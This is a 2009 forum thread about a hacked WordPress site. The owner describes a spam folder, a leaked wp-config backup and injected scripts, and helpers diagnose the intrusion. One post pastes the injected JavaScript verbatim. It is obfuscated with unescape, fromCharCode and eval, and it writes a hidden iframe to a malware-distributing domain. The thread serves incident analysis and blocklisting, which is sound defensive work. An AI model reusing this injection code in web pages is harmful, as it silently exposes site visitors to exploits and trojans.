Malware Domain List

Malware Related => Compromised Servers => Topic started by: MShelby on March 31, 2009, 06:44:04 am

Title: Malware on my site - added folder "rreeqs" and wp-config.php.mar04
Post by: MShelby on March 31, 2009, 06:44:04 am
site is

Received Malware warning when pulling it up 4 days ago.  Looks like the problem might have happened while I was using the wordpress basic uploader for photos.  The day the malware message showed up several of the uploaded photos started showing up blank with a question mark.  The folder they were uploaded into no longer had my site's UID.  The files that were blank also had the same invalid site id.

In addition, a folder labled rreeqs was added to my site with a bunch of trash that looked like hundreds of stupid links.  A file labled wp-config.php.mar04 was also created and had my password, etc, in it.  Every single one of my htm files and my valid wp-config.php file had a bogus js string added to them.  I deleted all the js.  Tech support - several hours later - was able to delete rreeqs (which I couldn't) and convert the UID on my upload folder back to the correct UID.  In addition, I decided it was time to clean up a bunch of unnecesary files/folders/domains that i didn't use

Next morning, host is down for maintenance for several hours.  When they come back up, it's like my site has been reverted back to where it was the previous day.  All the clean up of unnecessary files is undone.  Rreeqs and wp-config.php.mar04 and the bad UID are back.  The only place I found the bad js string, however was in my wp-config.php.  I did not have to reclean all of the other files.  I had changed my passwords the night before so the wp-config.php.mar04 had the old password instead of the new one.

3 days later and I am still waiting on tech support to acknowledge my trouble ticket and at least respond to me.  I want those files off my domain and can't do it myself.  Or can I?  Any ideas on what it is.  Do you think my suspicion is correct that it came through the wordpress basic uploader or am I way off on that?

Title: Re: Malware on my site - added folder "rreeqs" and wp-config.php.mar04
Post by: sowhat-x on March 31, 2009, 12:19:17 pm
As far as I know,there doesn't exist in public an exploit for WordPress should check the logs during the time of the incident in order to see how they broke in,
as i seriously doubt it came through wordpress basic it possible that your wp-config.php was somehow readable/in public view in the first place?
In a side note,would you mind posting the malicious js code here / url it was linking to?...
I've also sent you a pm...
Title: Re: Malware on my site - added folder "rreeqs" and wp-config.php.mar04
Post by: MShelby on March 31, 2009, 03:42:48 pm
The bad js was:

<!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(''+unescape('%3C%69%66%72')+String.fromCharCode(97)+String.fromCharCode(109)+''+'e id'+'="'+String.fromCharCode(50)+String.fromCharCode(98)+String.fromCharCode(97)+''+String.fromCharCode(52)+String.fromCharCode(50)+String.fromCharCode(98)+''+'d'+String.fromCharCode(102)+String.fromCharCode(97)+''+String.fromCharCode(97)+''+unescape('%32%34%35')+String.fromCharCode(100)+String.fromCharCode(52)+String.fromCharCode(48)+''+String.fromCharCode(101)+String.fromCharCode(52)+''+unescape('%61%32%37%37')+'b71'+unescape('%66%33%31')+unescape('%38')+'487"'+' na'+'me="'+'b4d3'+String.fromCharCode(52)+String.fromCharCode(100)+String.fromCharCode(57)+''+unescape('%31%30')+'d'+String.fromCharCode(54)+String.fromCharCode(52)+String.fromCharCode(52)+String.fromCharCode(56)+''+String.fromCharCode(101)+String.fromCharCode(49)+String.fromCharCode(100)+String.fromCharCode(97)+''+'7eb'+unescape('%35%61%34%37')+unescape('%66%62')+String.fromCharCode(102)+''+String.fromCharCode(57)+''+String.fromCharCode(97)+String.fromCharCode(54)+String.fromCharCode(102)+''+'"  w'+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+''+unescape('%3D%31%20%68')+String.fromCharCode(101)+String.fromCharCode(105)+''+unescape('%67%68%74')+unescape('%3D%31%20%66'<script> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script>

The rreeqs folder has been successfully deleted of my site and I don't have any record of the urls that were listed in it. 

Thanks for the info!  I was actually using wordpress 2.7 and hadn't upgraded yet to .1 .  I have now!  The file wp-config.php.maro4 was definitely readable as it was just like a txt file or something and spit out verbatim what my wp-config.php file had in it.
Title: Re: Malware on my site - added folder "rreeqs" and wp-config.php.mar04
Post by: sowhat-x on March 31, 2009, 03:58:29 pm
Thanks Melissa - a kinda of quick'n'dirty decoding of it shows the injection was pointing to following malicious url/domain:
The aformantioned domain was spotted few days ago around as well,it's spreading pdf exploits and "Waledac" trojans...
Title: Re: Malware on my site - added folder "rreeqs" and wp-config.php.mar04
Post by: sowhat-x on March 31, 2009, 04:03:01 pm
For the record,all domains in the same ip host malware/exploits etc... was already spotted and added in our list,here's one we had missed though...
Title: Re: Malware on my site - added folder "rreeqs" and wp-config.php.mar04
Post by: SysAdMini on March 31, 2009, 09:27:57 pm

Open directory.  ;D